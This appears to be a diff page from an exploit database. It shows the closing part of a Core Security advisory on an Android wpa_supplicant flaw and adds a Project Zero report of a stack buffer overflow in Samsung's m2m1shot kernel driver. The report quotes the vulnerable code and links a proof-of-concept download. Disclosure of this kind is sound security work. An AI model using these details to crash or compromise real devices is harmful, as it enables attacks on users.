Android Security Team acknowledges and strengthens it's position
that they don't currently have a timeline for releasing a fix.
. 2015-01-06:
Core Security requests a status update.
. 2015-01-12:
Core Security asks for confirmation of reception of the previous
email.
. 2015-01-16:
Android Security Team acknowledges and respond that they don't
currently have a timeline for releasing a fix.
. 2015-01-19:
Core Security notifies that vendor cooperation is needed in
order to keep this process coordinated. If vendor refuses to provide the
requested information the advisory will be released tagged as 'user
release'. The advisory is re-scheduled for January 26th, 2015.
. 2015-01-20:
Android Security Team acknowledges and respond that they don't
currently have a timeline for releasing a fix.
. 2015-01-26:
The advisory CORE-2015-0002 is published.
10. *References*
[1] - wpa_supplicant site. http://w1.fi/wpa_supplicant/
[2] - Lorcon site. https://code.google.com/p/lorcon
[3] - PyLorcon2 site. http://code.google.com/p/pylorcon2
11. *About CoreLabs*
CoreLabs, the research center of Core Security, is charged with
anticipating
the future needs and requirements for information security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright
(c) 2014 Core Security and (c) 2014 CoreLabs,
and are licensed under a Creative Commons
Attribution Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

38
exploits/android/dos/38555.txt Normal file
View file

@ -0,0 +1,38 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=493
The Samsung m2m1shot driver framework is used to provide hardware acceleration for certain media functions, such as JPEG decoding and scaling images. The driver endpoint (/dev/m2m1shot_jpeg) is accessible by the media server
The Samsung S6 Edge is a 64-bit device, so a compatibility layer is used to allow 32-bit processes to provide structures that are expected by the 64-bit driver. There is a stack buffer overflow in the compat ioctl for m2m1shot:
static long m2m1shot_compat_ioctl32(struct file *filp,
unsigned int cmd, unsigned long arg)
{
...
switch (cmd) {
case COMPAT_M2M1SHOT_IOC_PROCESS:
{
struct compat_m2m1shot data;
struct m2m1shot_task task;
int i, ret;
memset(&task, 0, sizeof(task));
if (copy_from_user(&data, compat_ptr(arg), sizeof(data))) {
dev_err(m21dev->dev,
"%s: Failed to read userdata\n", __func__);
return -EFAULT;
}
...
for (i = 0; i < data.buf_out.num_planes; i++) {
task.task.buf_out.plane[i].len =
data.buf_out.plane[i].len;
...
}
In this code snippet, the data.buf_out.num_planes value is attacker-controlled "u8" value, and is not bounds checked. However, task.task.buf_out.plane array is fixed in size (three elements), so a buffer overflow can occur during the loop shown above.
Proof-of-concept code to trigger this issue (from a privileged shell) is attached (m2m1shot_compat.c).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38555.zip

Some files were not shown because too many files have changed in this diff Show more